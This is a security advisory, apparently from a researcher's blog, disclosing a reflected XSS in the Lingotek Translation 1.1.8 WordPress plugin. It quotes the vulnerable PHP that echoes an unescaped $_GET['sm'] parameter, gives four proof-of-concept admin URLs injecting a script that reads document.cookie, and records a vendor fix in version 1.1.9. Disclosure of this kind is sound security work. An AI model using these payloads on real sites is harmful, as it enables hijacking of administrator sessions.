20-06-2016 / Vulnerabilities

Lingotek Translation 1.1.8 Reflected XSS

$_GET['sm'] is not escaped.

File: lingotek-translation\admin\settings.php

$submenu = isset($_GET['sm']) ? $_GET['sm'] : 'account';
$dir = dirname(__FILE__) . '/settings/';
$filename = $dir . 'view-' . $submenu . ".php";
if (file_exists($filename))
  include $filename;
else
  echo "TO-DO: create <i>" . 'settings/view-' . $submenu . ".php</i>";

Similar issue exists also inside view-manage.php and view-tutorial.php.

Proof of Concept

XSS will be visible for administrator.

http://wp/wp-admin/admin.php?page=wp-lingotek&sm=<script>alert(document.cookie);</script>
http://wp/wp-admin/admin.php?page=wp-lingotek_settings&sm=<script>alert(document.cookie);</script>
http://wp/wp-admin/admin.php?page=wp-lingotek_tutorial&sm=<script>alert(document.cookie);</script>
http://wp/wp-admin/admin.php?page=wp-lingotek_manage&sm=<script>alert(document.cookie);</script>

Timeline

02-12-2015: Discovered
02-12-2015: Vendor notified
19-01-2016: Version 1.1.9 released, issue resolved

Vulnerabilities

Kallithea <= 0.3.4 Incorrect access control and XSS

This vulnerability allows a normal user to modify the permissions of repositories that he normally shouldn’t have access to.

12-12-2018

2 MIN READ

Vulnerabilities

Gitea 1.4.0 Unauthenticated Remote Code Execution

This is part 1 of 3 about bugs inside Gitea

05-07-2018

5 MIN READ

Vulnerabilities

ManageEngine Exchange Reporter Plus Unauthenticated Remote Code Execution

How to create a Metasploit module in example?

28-06-2018

1 MIN READ